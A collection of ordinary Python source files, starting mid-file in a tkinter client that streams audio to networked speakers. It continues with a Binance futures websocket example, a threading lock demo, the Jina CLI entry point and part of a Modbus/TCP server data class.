self.Lh2.place(relx=0.3, rely=0.44, anchor='w')
self.Lh3.place(relx=0.3, rely=0.49, anchor='w')
self.Lh4.place(relx=0.3, rely=0.59, anchor='w')
self.Lh5.place(relx=0.3, rely=0.64, anchor='w')
self.Lh6.place(relx=0.3, rely=0.75, anchor='w')
self.Lh7.place(relx=0.36, rely=0.80, anchor='w')
self.Lh8.place(relx=0.36, rely=0.85, anchor='w')
img_logo.place(relx=0.5, rely=0.10, anchor="n")
self.not_yet_connect = True
self.not_yet_connect_2 = True
self.unsuccessful = False
self.unsuccessful_2 = False
self.connected_ = False
self.connected_2 = False
self.stop_1 = False
self.text_connect_('.')
ip1 = ip_input.get()
po1 = port_input.get()
ip2 = ip_input_1.get()
po2 = port_input_1.get()
self.address_1 =(ip1, po1)
self.address_2 =(ip2, po2)
t1 = threading.Thread(target=self.connect_1, daemon=True)
t2 = threading.Thread(target=self.connect_2, daemon=True)
t1.start()
t2.start()
self.b1['state'] ='disabled'
def text_connect_(self, s):
txt = "Connecting"+s
if len(txt)<20:
self.Lh1['text'] = txt
self._job_1 = self.frame.after(1000, self.text_connect_, s+' .')
else:
if self._job_1 is not None:
self.frame.after_cancel(self._job_1)
self._job_1 = None
if self.not_yet_connect and self.not_yet_connect_2:
self.text_connect_('.')
else:
if self.unsuccessful and self.unsuccessful_2:
self.Lh1['text'] = 'Connection Failed'
self.b1['state'] ='normal'
else:
if bool1.get() == True:
if self.connected_:
self.cancel_d_job()
self.backOpt()
self.connected_ = False
elif bool2.get() == True:
if self.connected_2:
self.cancel_d_job()
self.backOpt()
self.connected_2 = False
elif bool3.get() == True:
if (self.connected_ and self.connected_2):
self.cancel_d_job()
self.backOpt()
self.connected_ = False
self.connected_2 = False
self.text_connect_('.')
def cancel_d_job(self):
if self._job_1 is not None:
self.frame.after_cancel(self._job_1)
self._job_1 = None
def exit_(self):
self.destroy()
self.master2.show()
def backOpt(self):
self.withdraw()
self.master2.show()
def connect_1(self):
socket1= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print("Connecting at",self.address_1 )
socket1.connect(self.address_1)
print("Connected!" )
except Exception as e:
print(e)
self.connect_unsucessful_1()
self.not_yet_connect = False
self.unsuccessful =True
else: self.connected_ = True
def connect_2(self):
socket1= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print("Connecting at",self.address_2 )
socket1.connect(self.address_2)
print("Connected!" )
except Exception as e:
print(e)
self.connect_unsucessful_2()
self.not_yet_connect_2 = False
self.unsuccessful_2 =True
else: self.connected_2 = True
def connect_unsucessful_1(self):
t1 = 'Speaker 1: Connection Failed'
self.Lh7['text'] = t1
def connect_unsucessful_2(self):
t1 = 'Speaker 2: Connection Failed'
self.Lh8['text'] = t1
mysel = selectors.DefaultSelector()
class Client_Send(object):
def __init__(self, ip=None, port=None, ip2=None, port2=None):
super(Client_Send, self).__init__()
self.success_connect_1 = True
self.success_connect_2 = True
if ip != None and port != None:
self.ip = ip
self.port = int(port)+1
self.server_address = (self.ip, self.port)
else:
self.server_address = None
if ip2 != None and port2 != None:
self.ip2 = ip2
self.port2 = int(port2)+1
self.server_address_2 = (self.ip2, self.port2)
else:
self.server_address_2 = None
self.keep_running = True
json_ser1 = json.dumps(self.server_address)
json_ser2 = json.dumps(self.server_address_2)
self.live = Live_Client(json_ser1, json_ser2)
def running_all(self):
thread_1 = threading.Thread(target=self.server1_operate, daemon=True)
thread_2 = threading.Thread(target=self.server2_operate, daemon=True)
thread_1.start()
thread_2.start()
# self.server1_operate()
# self.server2_operate()
# self.server3_operate()
def server1_operate(self):
print('connecting to {} port {}'.format(*self.server_address))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(self.server_address)
except Exception as e:
print(f'error--1: {e}')
self.success_connect_1 = False
live_run.set(False)
else:
self.success_connect_1 = True
print("Successfully connect to 1")
if self.success_connect_1:
sock.setblocking(False)
# Set up the selector to watch for when the socket is ready
# to send data as well as when there is data to read.
mysel.register(sock, selectors.EVENT_READ | selectors.EVENT_WRITE, data=None)
# =========>
# =========//////////
self.main_operation()
def server2_operate(self):
print('connecting to {} port {}'.format(*self.server_address_2))
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock2.connect(self.server_address_2)
except Exception as e:
print(f'error--2: {e}')
self.success_connect_2 = False
else:
self.success_connect_2 = True
if self.success_connect_2:
sock2.setblocking(False)
print("Successfully connect to 2")
# Set up the selector to watch for when the socket is ready
# to send data as well as when there is data to read.
mysel.register(sock2, selectors.EVENT_READ | selectors.EVENT_WRITE, data=self.service_bluff)
# =========>
# =========//////////
self.main_operation_bluff()
def main_operation(self):
if self.keep_running:
print('waiting for I/O')
for key, mask in mysel.select(timeout=1):
connection = key.fileobj
self.client_address = connection.getpeername()
print('client({})'.format(self.client_address))
if mask & selectors.EVENT_WRITE:
self.service_operate(connection)
def main_operation_bluff(self):
if self.keep_running:
print('waiting for I/O')
for key, mask in mysel.select(timeout=1):
callback = key.data
callback(key.fileobj, mask)
def service_bluff(self, key, mask):
sock = key
if mask & selectors.EVENT_WRITE:
self.service_operate_bluff(sock)
# print('shutting down')
# mysel.unregister(connection)
# connection.close()
# mysel.close()
def service_operate(self, conn):
data = b'logarithmic'
pack_data = struct.pack(">ii11s", 32, 2319, data)
conn.sendall(pack_data)
if pack_data:
self.live.running_live()
mysel.unregister(conn)
conn.close()
def service_operate_bluff(self, conn):
data = b'logarithmic'
pack_data = struct.pack(">ii11s", 32, 2319, data)
conn.sendall(pack_data)
if pack_data:
print("done123")
mysel.unregister(conn)
conn.close()
class Live_Client(object):
def __init__(self, ip, ip2):
super(Live_Client, self).__init__()
ip_1 = ip
ip_2 = ip2
ip_1 = json.loads(ip_1)
ip_2 = json.loads(ip_2)
# self.ip = ip
# self.port = port
_ip1 = ip_1[0]
_port1 = ip_1[1]+1
_ip2 = ip_2[0]
_port2 = ip_2[1]+1
ip_3 = (_ip1, _port1)
ip_4 = (_ip2, _port2)
self.frames = []
self.addresses = ip_3
self.addresses_2 = ip_4
self.pausing = False
FORMAT = pyaudio.paInt16
CHUNK = 1024
self.chunk = CHUNK
CHANNELS = 2
RATE = 44100
self.Audio = pyaudio.PyAudio()
self.stream = self.Audio.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK,
)
def running_live(self):
self.AudioThread = threading.Thread(target=self.record, daemon=True)
self.udpThread = threading.Thread(target=self.udpStream, daemon=True)
self.AudioThread.start()
self.udpThread.start()
def udpStream(self):
print("connecting live at ", self.addresses)
print("were live now!")
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.z1 = udp
while True:
if self.pausing:
break
while True:
if self.pausing:
break
if len(self.frames) > 0:
frames_mod = self.frames.pop(0)
try:
self.z1.sendto(frames_mod, self.addresses)
except Exception as e:
#print(e)
pass
try:
self.z1.sendto(frames_mod, self.addresses_2)
except Exception as e:
pass
print("closing socket")
udp.close()
def record(self):
while True:
if self.pausing:
break
self.frames.append(self.stream.read(self.chunk))
print("closing recording")
self.stream.stop_stream()
self.stream.close()
self.Audio.terminate()
def stop_playing(self):
self.pausing = True
print("pausing")
def resume_playing(self):
self.pausing = False
class Client2_Send(object):
def __init__(self, ip=None, port=None, ip2=None, port2=None):
super(Client2_Send, self).__init__()
self.success_connect_1 = True
self.success_connect_2 = True
self.keep_running = True
if ip is not None and port is not None:
self.ip = ip
self.port = int(port)+1
self.server_address = (self.ip, self.port)
else:
self.server_address = None
if ip2 is not None and port2 is not None:
self.ip2 = ip2
self.port2 = int(port2)+1
self.server_address_2 = (self.ip2, self.port2)
else:
self.server_address_2 = None
self.waveclient = Client_wave()
def running_all(self):
file = open('name.txt', 'r+')
source = file.read()
self.source = source
t1 = threading.Thread(target=self.server1_operate, daemon=True)
t2 = threading.Thread(target=self.server2_operate, daemon=True)
t1.start()
t2.start()
t1.join()
t2.join()
def server1_operate(self):
print('connecting to {} port {}'.format(*self.server_address))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(self.server_address)
except Exception as e:
print(f'error--1: {e}')
self.success_connect_1 = False
else:
self.success_connect_1 = True
print("Successfully connect to 1")
if self.success_connect_1:
sock.setblocking(False)
# Set up the selector to watch for when the socket is ready
# to send data as well as when there is data to read.
mysel.register(sock, selectors.EVENT_READ | selectors.EVENT_WRITE, )
# =========>
# =========//////////
self.main_operation()
def server2_operate(self):
try:
print('connecting to {} port {}'.format(*self.server_address_2))
except TypeError as e:
pass
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock2.connect(self.server_address_2)
except Exception as e:
print(f'error--2: {e}')
self.success_connect_2 = False
else:
self.success_connect_2 = True
if self.success_connect_2:
sock2.setblocking(False)
print("Successfully connect to 2")
# Set up the selector to watch for when the socket is ready
# to send data as well as when there is data to read.
mysel.register(sock2, selectors.EVENT_READ | selectors.EVENT_WRITE, )
# =========>
# =========//////////
self.main_operation()
def main_operation(self):
if self.keep_running:
print('waiting for I/O')
for key, mask in mysel.select(timeout=1):
connection = key.fileobj
self.client_address = connection.getpeername()
print('client({})'.format(self.client_address))
if mask & selectors.EVENT_WRITE:
self.service_operate(connection)
def service_operate(self, conn):
data = b"xboxlive2020operate"
pack_data = struct.pack(">i19si", 4020, data, 202304)
conn.sendall(pack_data)
if pack_data:
address_1 = conn.getpeername()
ip_add = address_1[0]
port_add = address_1[1]
source = self.source
print("sending data")
self.waveclient.operator_wav(ip_add,port_add, source)
#w.operator_wav()
mysel.unregister(conn)
conn.close()
class Client_wave(object):
def __init__(self):
super(Client_wave, self).__init__()
self.resume_play()
self.done = False
# if port is not None:
# self.port = int(port)
self.frames = []
#self.source = "waves.wav" #####GENEL ari alisdi ang file pag send
#self.destination = "_sample_wav.wav"
self.chunks = 1000
self.t = 0.00125
self.Audio = pyaudio.PyAudio()
self.connected_ = False
self.stop1 = False
self.pause2 = False
self.resume1 = False
self.done__ = False
def operator_wav(self,ip, port, source):
self.ip = ip
self.port = port+1
self.port_1 = port+2
self.server_address = (self.ip, self.port)
self.server_address_1 = (self.ip, self.port_1)
self.source = source
wf = wave.open(self.source, 'rb')
sample_width = wf.getsampwidth()
print(f"Sample width: {sample_width}")
sample_rate = wf.getframerate()
print(f"Sample rate: {sample_rate}")
channels = wf.getnchannels()
print(f"Channels: {channels}")
pyaudio_format = self.Audio.get_format_from_width(sample_width)
print(f"Format: {pyaudio_format}")
self.send_info(pyaudio_format, sample_rate, channels)
print("the connect is :", self.connected_)
if self.connected_:
nu_frames = wf.getnframes()
print(f"No. of frames : {nu_frames}")
wf.close()
self.processing_init()
print("Done sending wav")
def processing_init(self):
# Initialize Threads
udpThread = threading.Thread(target=self.udpStream, daemon=True)
udpThread.start()
udpThread.join()
def udpStream(self):
self.stop1 = False
wf = wave.open(self.source, 'rb')
size = wf.getnframes()
num_packets = int((size/self.chunks)+1)
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for i in range(num_packets):
if self.stop1:
break
if self.pause2:
while True:
if self.resume1:
self.pause2 = False
self.resume1 = False
break
continue
udp.sendto(wf.readframes(self.chunks), self.server_address_1)
progress_var.set(i)
val = str(int((i/num_packets)*100))
percentage_.set(val + "%")
root.update()
time.sleep(self.t)
self.done__ = True
print("closing socket")
udp.close()
def send_info(self, format_py, sample_rate, channels):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
print("Connecting to {}".format(self.server_address))
try:
sock.connect(self.server_address)
except:
print("Can't connect target machine refuse.")
self.connected_ = False
else:
self.connected_ = True
if self.connected_:
file_info = struct.pack(">iii", format_py, sample_rate, channels)
sock.send(file_info)
print("format is send!")
sock.close()
def stop_play(self):
self.stop1 = True
self.done__ = True
def resume_play(self):
self.done__ = False
self.resume1 = True
def pause_play(self):
self.pause2 = True
self.done__ = True
class Client3_Send(object):
def __init__(self, ip=None, port=None, ip2=None, port2=None):
super(Client3_Send, self).__init__()
self.success_connect_1 = True
self.success_connect_2 = True
self.keep_running = True
if ip is not None and port is not None:
self.ip = ip
self.port = int(port)+1
self.server_address = (self.ip, self.port)
else:
self.server_address = None
if ip2 is not None and port2 is not None:
self.ip2 = ip2
self.port2 = int(port2)+1
self.server_address_2 = (self.ip2, self.port2)
else:
self.server_address_2 = None
self.hourbell = Client_hourbell()
def running_all(self, name):
if os.path.exists('sound.txt'):
w = open('sound.txt', 'r+')
w = w.read()
source = json.loads(w)
else:
t1 = item_source.get()
source = {**t1}
source = source[name]
self.source = source
t1 = threading.Thread(target=self.server1_operate, daemon=True)
t2 = threading.Thread(target=self.server2_operate, daemon=True)
t1.start()
t2.start()
t1.join()
t2.join()
def server1_operate(self):
print('connecting to {} port {}'.format(*self.server_address))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(self.server_address)
except Exception as e:
print(f'error--1: {e}')
self.success_connect_1 = False
else:
self.success_connect_1 = True
print("Successfully connect to 1")
if self.success_connect_1:
sock.setblocking(False)
# Set up the selector to watch for when the socket is ready
# to send data as well as when there is data to read.
mysel.register(sock, selectors.EVENT_READ | selectors.EVENT_WRITE, )
# =========>
# =========//////////
self.main_operation()
def server2_operate(self):
try:
print('connecting to {} port {}'.format(*self.server_address_2))
except TypeError as e:
pass
sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock2.connect(self.server_address_2)
except Exception as e:
print(f'error--2: {e}')
self.success_connect_2 = False
else:
self.success_connect_2 = True
if self.success_connect_2:
sock2.setblocking(False)
print("Successfully connect to 2")
# Set up the selector to watch for when the socket is ready
# to send data as well as when there is data to read.
mysel.register(sock2, selectors.EVENT_READ | selectors.EVENT_WRITE, )
# =========>
# =========//////////
self.main_operation()
def main_operation(self):
if self.keep_running:
print('waiting for I/O')
for key, mask in mysel.select(timeout=1):
connection = key.fileobj
self.client_address = connection.getpeername()
print('client({})'.format(self.client_address))
if mask & selectors.EVENT_WRITE:
self.service_operate(connection)
def service_operate(self, conn):
data = b"l01ik20apBjok0q3k2oCo3k3Piz3i"
pack_data = struct.pack(">29sii", data, 10390, 209340)
conn.sendall(pack_data)
if pack_data:
address_1 = conn.getpeername()
ip_add = address_1[0]
port_add = address_1[1]
source = self.source
print("sending data")
self.hourbell.operator_wav(ip_add,port_add, source)
#w.operator_wav()
mysel.unregister(conn)
conn.close()
class Client_hourbell(object):
def __init__(self):
super(Client_hourbell, self).__init__()
self.resume_play()
self.done = False
self.frames = []
self.chunks = 1000
self.t = 0.00125
self.Audio = pyaudio.PyAudio()
self.connected_ = False
self.stop1 = False
self.pause2 = False
self.resume1 = False
self.done__ = False
def operator_wav(self,ip, port, source):
self.ip = ip
self.port = port+1
self.port_1 = port+2
self.server_address = (self.ip, self.port)
self.server_address_1 = (self.ip, self.port_1)
self.source = source
wf = wave.open(self.source, 'rb')
sample_width = wf.getsampwidth()
print(f"Sample width: {sample_width}")
sample_rate = wf.getframerate()
print(f"Sample rate: {sample_rate}")
channels = wf.getnchannels()
print(f"Channels: {channels}")
pyaudio_format = self.Audio.get_format_from_width(sample_width)
print(f"Format: {pyaudio_format}")
self.send_info(pyaudio_format, sample_rate, channels)
print("the connect is :", self.connected_)
if self.connected_:
nu_frames = wf.getnframes()
print(f"No. of frames : {nu_frames}")
wf.close()
self.processing_init()
print("Done sending wav")
def processing_init(self):
# Initialize Threads
udpThread = threading.Thread(target=self.udpStream, daemon=True)
udpThread.start()
udpThread.join()
def udpStream(self):
self.stop1 = False
wf = wave.open(self.source, 'rb')
size = wf.getnframes()
num_packets = int((size/self.chunks)+1)
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for i in range(num_packets):
if self.stop1:
break
if self.pause2:
while True:
if self.resume1:
self.pause2 = False
self.resume1 = False
break
continue
udp.sendto(wf.readframes(self.chunks), self.server_address_1)
progress_var.set(i)
val = str(int((i/num_packets)*100))
percentage_.set(val + "%")
root.update()
time.sleep(self.t)
self.done__ = True
print("closing socket")
udp.close()
def send_info(self, format_py, sample_rate, channels):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
print("Connecting to {}".format(self.server_address))
try:
sock.connect(self.server_address)
except:
print("Can't connect target machine refuse.")
self.connected_ = False
else:
self.connected_ = True
if self.connected_:
file_info = struct.pack(">iii", format_py, sample_rate, channels)
sock.send(file_info)
print("format is send!")
sock.close()
def stop_play(self):
self.stop1 = True
self.done__ = True
def resume_play(self):
self.done__ = False
self.resume1 = True
def pause_play(self):
self.pause2 = True
self.done__ = True
def center_window(app, w=300, h=200):
ws = app.winfo_screenwidth()
hs = app.winfo_screenheight()
# calculate position x, y
x = (ws / 2) - (w / 2)
y = (hs / 2) - (h / 2)
app.geometry('%dx%d+%d+%d' % (w, h, x, y))
if __name__ == '__main__':
root = tk.Tk()
ip_input = tk.StringVar(root)
ip_input_1 = tk.StringVar(root)
port_input = tk.IntVar(root)
port_input_1 = tk.IntVar(root)
bool1 = tk.BooleanVar(root)
bool2 = tk.BooleanVar(root)
bool3 = tk.BooleanVar(root)
live_run = tk.BooleanVar(root)
#------
_conn1 = tk.StringVar(root)
_conn2 = tk.StringVar(root)
_conn3 = tk.StringVar(root)
_conn4 = tk.StringVar(root)
progress_var = tk.DoubleVar(root)
percentage_ = tk.StringVar(root)
item_source = tk.StringVar(root)
app = MainWindow(root)
root.mainloop()
|
example_binance_futures.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_binance_futures.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
# create instance of BinanceWebSocketApiManager for Binance.com Futures
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com-futures")
# set api key and secret for userData stream
binance_je_api_key = ""
binance_je_api_secret = ""
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"],
["!userData"],
api_key=binance_je_api_key,
api_secret=binance_je_api_secret)
bookticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!bookTicker"])
# https://binance-docs.github.io/apidocs/futures/en/#mark-price-stream-for-all-market
binance_websocket_api_manager.create_stream(["!markPrice"], "arr@1s", stream_label="!markPrice@arr@1s")
markets = {'btcusdt', 'bchusdt', 'ethusdt'}
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
binance_websocket_api_manager.create_stream(["markPrice"], markets)
binance_websocket_api_manager.create_stream(["kline_1m"], markets)
binance_websocket_api_manager.create_stream(["kline_5m"], markets)
binance_websocket_api_manager.create_stream(["kline_15m"], markets)
binance_websocket_api_manager.create_stream(["kline_1h"], markets)
binance_websocket_api_manager.create_stream(["kline_12h"], markets)
binance_websocket_api_manager.create_stream(["kline_1w"], markets)
binance_websocket_api_manager.create_stream(["ticker"], markets)
binance_websocket_api_manager.create_stream(["miniTicker"], markets)
binance_websocket_api_manager.create_stream(["bookTicker"], markets)
binance_websocket_api_manager.create_stream(["depth"], markets)
binance_websocket_api_manager.create_stream(["depth@2500ms"], markets)
binance_websocket_api_manager.create_stream(["depth5"], markets)
binance_websocket_api_manager.create_stream(["depth5@100ms"], markets)
binance_websocket_api_manager.create_stream(["depth10"], markets)
binance_websocket_api_manager.create_stream(["depth20"], markets)
binance_websocket_api_manager.create_stream(["compositeIndex"], markets, stream_label="compositeIndex")
channels = {'aggTrade', 'markPrice' 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h',
'miniTicker', 'depth20@100ms', 'bookTicker', 'forceOrder', '!forceOrder', 'kline_1w@250ms',
'compositeIndex'}
binance_websocket_api_manager.create_stream(channels, markets)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
binance_websocket_api_manager.print_summary()
time.sleep(1)
|
ex1.py | import threading
NUM_THREAD = 10
mutex = threading.Lock()
printed = False
def print_text():
global printed
mutex.acquire ()
if not printed:
printed = True
print ("printed once")
mutex.release()
threads = []
for i in range (NUM_THREAD):
t = threading.Thread (target=print_text)
threads.append(t)
t.start()
for i in range (NUM_THREAD):
threads[i].join()
|
__init__.py | import os
import shutil
import subprocess
import sys
from packaging.version import Version, parse
def _get_run_args(print_args: bool = True):
from jina.helper import get_rich_console
from jina.parsers import get_main_parser
console = get_rich_console()
silent_print = {'help', 'hub'}
parser = get_main_parser()
if len(sys.argv) > 1:
from argparse import _StoreAction, _StoreTrueAction
from rich import box
from rich.table import Table
args, unknown = parser.parse_known_args()
if unknown:
from jina.helper import warn_unknown_args
unknown = list(filter(lambda x: x.startswith('--'), unknown))
warn_unknown_args(unknown)
if args.cli not in silent_print and print_args:
from jina import __resources_path__
p = parser._actions[-1].choices[sys.argv[1]]
default_args = {
a.dest: a.default
for a in p._actions
if isinstance(a, (_StoreAction, _StoreTrueAction))
}
with open(os.path.join(__resources_path__, 'jina.logo')) as fp:
logo_str = fp.read()
param_str = Table(title=None, box=box.ROUNDED, highlight=True)
param_str.add_column('')
param_str.add_column('Parameters', justify='right')
param_str.add_column('Value', justify='left')
for k, v in sorted(vars(args).items()):
sign = ' ' if default_args.get(k, None) == v else '🔧️'
param = k.replace('_', '-')
value = str(v)
style = None if default_args.get(k, None) == v else 'blue on yellow'
param_str.add_row(sign, param, value, style=style)
print(f'\n{logo_str}\n')
console.print(f'▶️ {" ".join(sys.argv)}', param_str)
return args
else:
parser.print_help()
exit()
def _quick_ac_lookup():
from cli.autocomplete import ac_table
if len(sys.argv) > 1:
if sys.argv[1] == 'commands':
for k in ac_table['commands']:
print(k)
exit()
elif sys.argv[1] == 'completions':
# search with the longest shared prefix
for j in range(len(sys.argv), 2, -1):
_input = ' '.join(sys.argv[2:j]).strip()
if _input in ac_table['completions']:
compl = ac_table['completions'][_input]
for k in compl:
if k not in sys.argv:
print(k)
break
exit()
def _parse_latest_release_version(resp):
# credit: https://stackoverflow.com/a/34366589
import json
latest_release_ver = parse('0')
j = json.load(resp)
releases = j.get('releases', [])
for release in releases:
latest_ver = parse(release)
if not latest_ver.is_prerelease:
latest_release_ver = max(latest_release_ver, latest_ver)
return latest_release_ver
def _is_latest_version(package='jina', suppress_on_error=True):
try:
import warnings
from urllib.request import Request, urlopen
import pkg_resources
cur_ver = Version(pkg_resources.get_distribution(package).version)
req = Request(
f'https://pypi.python.org/pypi/{package}/json',
headers={'User-Agent': 'Mozilla/5.0'},
)
with urlopen(
req, timeout=5
) as resp: # 'with' is important to close the resource after use
latest_release_ver = _parse_latest_release_version(resp)
if cur_ver < latest_release_ver:
from jina.logging.predefined import default_logger
default_logger.warning(
f'You are using {package} version {cur_ver}, however version {latest_release_ver} is available. '
f'You should consider upgrading via the "pip install --upgrade {package}" command.'
)
return False
return True
except:
# no network, too slow, PyPi is down
if not suppress_on_error:
raise
def _is_latest_version_plugin(subcommand):
from .known_plugins import plugin_info
if subcommand in plugin_info:
_is_latest_version(package=plugin_info[subcommand]['pip-package'])
def _try_plugin_command():
"""Tries to call the CLI of an external Jina project.
:return: if the plugin has been found (locally or among the known plugins)
"""
argv = sys.argv
if len(argv) < 2: # no command given
return False
from .autocomplete import ac_table
if argv[1] in ac_table['commands']: # native command can't be plugin command
return False
def _cmd_exists(cmd):
return shutil.which(cmd) is not None
subcommand = argv[1]
cmd = 'jina-' + subcommand
if _cmd_exists(cmd):
import threading
threading.Thread(
target=_is_latest_version_plugin,
daemon=True,
args=(subcommand,),
).start()
subprocess.run([cmd] + argv[2:])
return True
from .known_plugins import plugin_info
if subcommand in plugin_info:
from jina.helper import get_rich_console
cmd_info = plugin_info[subcommand]
project, package = cmd_info['display-name'], cmd_info['pip-package']
console = get_rich_console()
console.print(
f"It seems like [yellow]{project}[/yellow] is not installed in your environment."
f"To use it via the [green]'jina {subcommand}'[/green] command, "
f"install it first: [green]'pip install {package}'[/green]."
)
return True
return False
def main():
"""The main entrypoint of the CLI"""
# checking version info in another thread
import threading
threading.Thread(target=_is_latest_version, daemon=True, args=('jina',)).start()
found_plugin = _try_plugin_command()
if not found_plugin:
_quick_ac_lookup()
from cli import api
args = _get_run_args()
getattr(api, args.cli.replace('-', '_'))(args)
|
server.py | # -*- coding: utf-8 -*-
# Python module: ModbusServer class (ModBus/TCP Server)
from . import constants as const
from .utils import test_bit, set_bit
import socket
import struct
from threading import Lock, Thread
# for python2 compatibility
try:
from socketserver import BaseRequestHandler, ThreadingTCPServer
except ImportError:
from SocketServer import BaseRequestHandler, ThreadingTCPServer
class DataBank:
""" Data class for thread safe access to bits and words space """
# coils, holding registers
bits_lock = Lock()
bits = [False] * 0x10000
words_lock = Lock()
words = [0] * 0x10000
# discrete inputs, input registers
bits2_lock = Lock()
bits2 = [False] * 0x10000
words2_lock = Lock()
words2 = [0] * 0x10000
@classmethod
def get_coils(cls, address, number=1):
"""Read data on server bits space
:param address: start address
:type address: int
:param number: number of bits (optional)
:type number: int
:returns: list of bool or None if error
:rtype: list or None
"""
# secure extract of data from list used by server thread
with cls.bits_lock:
if (address >= 0) and (address + number <= len(cls.bits)):
return cls.bits[address: number + address]
else:
return None
@classmethod
def get_discrete_inputs(cls, address, number=1):
"""Read data on server bits space
:param address: start address
:type address: int
:param number: number of bits (optional)
:type number: int
:returns: list of bool or None if error
:rtype: list or None
"""
# secure extract of data from list used by server thread
with cls.bits2_lock:
if (address >= 0) and (address + number <= len(cls.bits2)):
return cls.bits2[address: number + address]
else:
return None
@classmethod
def set_coils(cls, address, bit_list):
"""Write data to server bits space
:param address: start address
:type address: int
:param bit_list: a list of bool to write
:type bit_list: list
:returns: True if success or None if error
:rtype: bool or None
:raises ValueError: if bit_list members cannot be convert to bool
"""
# ensure bit_list values are bool
bit_list = [bool(b) for b in bit_list]
# secure copy of data to list used by server thread
with cls.bits_lock:
if (address >= 0) and (address + len(bit_list) <= len(cls.bits)):
cls.bits[address: address + len(bit_list)] = bit_list
return True
else:
return None
@classmethod
def set_discrete_inputs(cls, address, bit_list):
"""Write data to server bits space
:param address: start address
:type address: int
:param bit_list: a list of bool to write
:type bit_list: list
:returns: True if success or None if error
:rtype: bool or None
:raises ValueError: if bit_list members cannot be convert to bool
"""
# ensure bit_list values are bool
bit_list = [bool(b) for b in bit_list]
# secure copy of data to list used by server thread
with cls.bits2_lock:
if (address >= 0) and (address + len(bit_list) <= len(cls.bits2)):
cls.bits2[address: address + len(bit_list)] = bit_list
return True
else:
return None
@classmethod
def get_holding_registers(cls, address, number=1):
"""Read data on server words space
:param address: start address
:type address: int
:param number: number of words (optional)
:type number: int
:returns: list of int or None if error
:rtype: list or None
"""
# secure extract of data from list used by server thread
with cls.words_lock:
if (address >= 0) and (address + number <= len(cls.words)):
return cls.words[address: number + address]
else:
return None
@classmethod
def get_input_registers(cls, address, number=1):
"""Read data on server words space
:param address: start address
:type address: int
:param number: number of words (optional)
:type number: int
:returns: list of int or None if error
:rtype: list or None
"""
# secure extract of data from list used by server thread
with cls.words2_lock:
if (address >= 0) and (address + number <= len(cls.words2)):
return cls.words2[address: number + address]
else:
return None
@classmethod
def set_holding_registers(cls, address, word_list):
"""Write data to server words space
:param address: start address
:type address: int
:param word_list: a list of word to write
:type word_list: list
:returns: True if success or None if error
:rtype: bool or None
:raises ValueError: if word_list members cannot be convert to int
"""
# ensure word_list values are int with a max bit length of 16
word_list = [int(w) & 0xffff for w in word_list]
# secure copy of data to list used by server thread
with cls.words_lock:
if (address >= 0) and (address + len(word_list) <= len(cls.words)):
cls.words[address: address + len(word_list)] = word_list
return True
else:
return None
@classmethod
def set_input_registers(cls, address, word_list):
"""Write data to server words space
:param address: start address
:type address: int
:param word_list: a list of word to write
:type word_list: list
:returns: True if success or None if error
:rtype: bool or None
:raises ValueError: if word_list members cannot be convert to int
"""
# ensure word_list values are int with a max bit length of 16
